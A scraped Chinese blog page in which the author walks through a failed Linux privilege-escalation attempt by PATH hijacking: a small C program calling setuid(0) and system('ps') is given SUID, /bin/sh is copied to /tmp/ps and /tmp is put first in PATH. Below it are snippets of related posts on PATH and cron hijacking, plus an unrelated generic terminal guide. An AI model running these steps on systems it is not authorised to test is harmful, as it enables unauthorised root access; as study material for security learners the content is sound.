LINUX 环境变量提权(失败)

最新推荐文章于 2024-04-25 20:47:12 发布
最新推荐文章于 2024-04-25 20:47:12 发布
阅读量257 收藏
点赞数
分类专栏: Linux提权 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65096687/article/details/130845349
版权
文章讲述了Linux系统中利用环境变量进行提权的原理,通过创建C程序设置SUID权限,并尝试替换系统命令来实现提权。然而,在实际操作中,尝试用`./yx`和修改PATH变量后,提权并未成功,留下了问题供读者思考和解决。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境变量提权

环境变量提权就是linux在执行系统命令的时候,会调用一些环境变量的文件。

然后我们对环境变量的文件进行替换。

比如说,执行id和执行/bin/id

效果是一样的,可以理解未win安装python时候需要添加环境变量,然后cmd可以直接运行python

接下来是复现过程

写一个c文件放到对方服务器上去编译成第三方软件

yx.c

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

这是c文件的内容,然后传到目标主机编译成第三方软件

 然后给yx文件SUID权限

 然后

替换

cp /bin/sh /tmp/ps 

export PATH=/tmp:$PATH

./yx

id   查看用户

好,提权失败

不知道为啥 

操作系统(二十一)Linux-环境变量劫持
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-01 1060
假设管理员用户在/home目录下创建了一个demo.c文件,内容如下,执行查看shadow文件命令,setuid 规定了其运行用户,以root限进行编译和限设置。如果我们可以在环境变量中写入自己的环境变量,然后写一个自己的恶意命令,从而达到的目的。接下来用命令查找SUID文件,发现一个shell文件被配置了SUID。运行shell文件,发现是查看/etc/shadow的命令。可以看到目前我们的用户是一个普通用户daoer的限。那么我们劫持cat命令,达到的目的。接下来就可以进行了。
105.网络安全渗透测试—[升篇3]—[Linux劫持环境变量]
qwsn
02-15 4774
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、劫持环境变量 1、背景 2、原理 3、限制 3、测试 在tmp目录下建立一个文件cat,然后开启一个shell
Linux sudo 异常的情况
码农终结者的博客
02-04 872
这一篇主要记录几个关于 sudo 失败或者执行异常的情况
linux 总结
weixin_51681694的博客
06-13 8540
会继续补充.....
setuid(0)失败原因
pyxllq的博客
09-29 1833
setuid失败问题,返回错误码是EPERM
setuid()与setgid() -- 设置 UID 和 GID
宝剑锋从磨砺出,梅花香自苦寒来!
10-22 2252
用 setuid() 设置实际用户 UID 和有效用户 UID。 用 setgid() 设置实际组 ID 和有效组 ID。 两个函数声明如下: -- 设置 UID 和 GID" height="85" alt="setuid()与setgid() -- 设置 UID 和 GID" src="http://s6.sinaimg.cn/middle/70137129gadefa656c325&6
Linux与数据库
赤赤三的博客
03-20 757
Linux系统内核漏洞:(常见的就是系统内核 | 脏牛 | suid) 原理: linux内核版本的分类 Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字 第一个组数字:目前发布的内核主版本。 第二个组数字:偶数表示稳定版本;奇数表示开发中版本。 第三个组数字:错误修补的次数。 思路(利用linux系统漏洞进行,首先搜索linux系统漏洞,然后去github搜索Debian 5对应
linux环境下的MySQL UDF
黑战士的博客
04-25 2347
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞的时候发现补丁全部被修补。这个时候需要利用第三方应用。当MYSQL限比较高的时候我们就可以利用udf。###利用前mysqlfuncfunc。
ATT&CK升-Linux总结
u013797594的博客
06-12 1948
ATT&CK升-Linux总结
Linux基础
2301_77004573的博客
11-08 371
( backup.sh 脚本有定义完整的路径),cron 将引用 /etc/crontab 文件中的 PATH 变量下列出的路径;在这种情况下,我们可以尝试在用户的主文件夹(home)下创建一个名为“antivirus.sh”的脚本,然后让它作为 cron 任务运行。最终传入的反向 shell 连接能够帮助我们成功获取 root 限。一旦你发现现有的脚本或任务被附加到cron jobs,那么就值得花时间去了解相关脚本的功能以及如何在上下文中使用工具对cron jobs进行利用。
setuid函数
wyymaomi的专栏
07-29 1595
setuid(设置真实的用户识别码) 相关函数 getuid,setreuid,seteuid,setfsuid 表
Linux: 普通用户使用sudo命令报错
StudyHappiness的博客
07-03 2121
Linux用户之间有限隔离,为了防止root用户被多人掌握,导致泄漏,造成安全问题。通常要限制root的使用,但是在Linux使用期间,不可避免的要使用到更高的限,因此给普通用户授予“限是最好的选择,本文介绍的是在授予限过程中遇到的问题及解决方法。...
setuid()与seteuid()的区别
nyist327的专栏
08-30 6015
setuid()与seteuid()的区别.
setuid函数解析
weixin_30687051的博客
01-15 647
  在讨论这个setuid函数之前,我们首先要了解的一个东西就是内核为每个进程维护的三个UID值。这三个UID分别是实际用户ID(real uid)、有效用户ID(effective uid)、保存的设置用户ID(saved set-user-ID)。   首先说这个实际用户ID,就是我们当前以哪个用户登录了,我们运行的程序的实际用户ID就是这个用户的ID。有效用户ID就是当前进程是以哪个用户I...
Android adb setuid漏洞的分析(转)
weixin_30940783的博客
08-29 356
原文:http://blog.claudxiao.net/2011/04/android-adb-setuid/ 去年的Android adb setuid漏洞被用于各类root刷机,漏洞发现人Sebastian Krahmer公布的利用工具RageAgainstTheCage(rageagainstthecage-arm5.bin)被用于z4root等工具、Trojan.Android...
ubuntu /usr/bin/sudo必须属于用户ID 0(的用户)并设置setuid位 踩坑解决
热门推荐
qq_38883889的博客
11-13 1万+
/usr/bin/sudo必须属于用户ID 0(的用户) 和 /usr/lib/sudo/sudoers.so 必须属于用户 ID 0 (的用户)踩坑解决 前言解决方法踩坑 前言 今天下面一个小兄弟使用Ubuntu安装vmware时不小心把sudo的所属组和限给弄没了, 在网上找了各种办法还是会报错,下面供一下解决方案。 解决方法 1.参考网上的解决方案,第一步先进入(recovery)单人模式 重启电脑按住shift不放进入grub 选择高级选项 然后选择 recovery mode
ubuntu /usr/bin必须属于用户ID 0(的用户)并设置setuid位 可能的解决办法
qq_45819701的博客
05-05 4364
ubuntu /usr/bin必须属于用户ID 0(的用户)并设置setuid位 事情的起因是在学习Linux的过程中,一直切换用户不方便,突发奇想把/usr目录的限给另一个用户。所以我执行了以下命令: sudo chown -R /usr 在输入root密码后执行了一段时间。接着在我使用sudo有关命令时报了以上错误。并且在使用命令su root切换用户时,输入密码返回认证失败。还有wifi按钮失踪。 网上的解决办法主要有两种: 方法一: Ctrl + Alt +F3,进入单人模式,输入root密码
【领卓教育】sudo:/usr/bin/sudo 必须属于用户 ID 0(的用户)并且设置 setuid 位;解决方法;
Printf_y的博客
10-30 8487
sudo:/usr/bin/sudo 必须属于用户 ID 0(的用户)并且设置 setuid 位; 是之前的误操作,导致sudo不能正常的使用,每次输入sudo,都会醒 : sudo:/usr/bin/sudo 必须属于用户 ID 0(的用户)并且设置 setuid 位; 这是因为修改了usr的限,将usr整个文件夹的限都修改为自己的组,而不是root; 这个问题的修改方法: 进入r...
linux 终端
最新发布
03-18
<think>好的,我现在需要帮助用户了解Linux终端的基本用法和常见问题解决方案。首先,我需要整理用户供的引用资料,看看有没有相关的信息可以直接应用。 用户到了几个引用,其中引用[2]到了在Linux(以Ubuntu 16.04为例)使用apt-get安装依赖库,这可能和终端命令相关。引用[4]到了在MacOS/Linux中添加路径到系统路径,这也涉及终端操作。此外,用户可能需要基本的终端命令,比如导航、文件操作、限管理等。 接下来,我需要按照用户的要求,结构清晰地回答,分步骤说明。可能包括基本命令、常见问题及解决方法。同时,要确保使用正确的中文表达,并按照系统级指令中的格式要求,数学表达式用$...$,独立公式用$$...$$,但这里可能数学公式用得少,主要是代码块和命令示例。 需要检查是否有相关的常见问题在引用中出现,比如安装软件、路径问题、限不足等,然后结合引用中的解决方案。例如,引用[2]中的安装依赖库可能对应到使用apt-get命令,引用[4]中的路径问题需要添加到PATH环境变量。 另外,用户可能需要知道如何检查软件版本,如引用[2]中的python --version,这也属于终端命令的一部分。还有如何运行程序,如引用[1]中的./hello_world,这也是终端的基本操作。 在回答中要自然地添加引用标识,例如在到安装软件时引用[2],在路径配置时引用[4]。生成的相关问题需要考虑用户可能的后续疑问,比如如何编写脚本、解决限问题、配置环境变量等。 最后,确保回答结构清晰,分点说明,代码示例用正确的格式,并遵守用户的所有格式要求。</think>### Linux终端使用指南及常见问题解决方案 #### 一、基础操作 1. **目录导航** - `pwd` 显示当前目录路径 - `cd <目录名>` 切换目录(例如 `cd Documents` 进入文档目录) - `ls` 列出当前目录内容(加参数 `-l` 显示详情,`-a` 显示隐藏文件) 2. **文件操作** - `touch <文件名>` 创建空文件 - `cp <源文件> <目标路径>` 复制文件 - `mv <源文件> <目标路径>` 移动或重命名文件 - `rm <文件名>` 删除文件(加 `-r` 删除目录,如 `rm -r folder`) 3. **限管理** - `chmod +x <文件>` 添加可执行限 - `sudo <命令>` 以管理员限执行命令(例如 `sudo apt update`)[^2] --- #### 二、常见问题及解决方法 1. **程序找不到命令** - **现象**:输入命令后示 `command not found` - **原因**:程序未安装或未加入系统路径 - **解决步骤**: 1. 检查是否安装:`which <命令名>`(例如 `which python3`) 2. 若未安装,使用包管理器安装: ```bash sudo apt-get install <软件包名> # Ubuntu/Debian系统示例 ``` 3. 若已安装但路径未配置,手动添加路径到 `PATH` 环境变量: ```bash export PATH=$PATH:~/自定义路径 # 临时生效[^4] ``` (永久生效需修改 `~/.bashrc` 或 `~/.zshrc` 文件) 2. **限不足导致操作失败** - **现象**:示 `Permission denied` - **解决步骤**: 1. 使用 `sudo` 执行命令 2. 修改文件限:`sudo chmod 777 <文件名>`(谨慎使用) 3. **软件安装依赖冲突** - **现象**:安装时示依赖版本不兼容 - **解决步骤**: 1. 更新软件源:`sudo apt update` 2. 尝试修复依赖:`sudo apt --fix-broken install` --- #### 三、实用技巧 1. **管道与重定向** - `命令 > 文件` 将输出重定向到文件(覆盖) - `命令 >> 文件` 追加输出到文件 - `命令1 | 命令2` 将前者的输出作为后者的输入(例如 `ls | grep .txt`) 2. **后台运行任务** - `命令 &` 后台运行程序(例如 `python3 script.py &`) - `nohup 命令 &` 退出终端后仍保持运行 3. **查看系统信息** - `uname -a` 查看内核版本 - `df -h` 查看磁盘空间 - `free -h` 查看内存使用 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值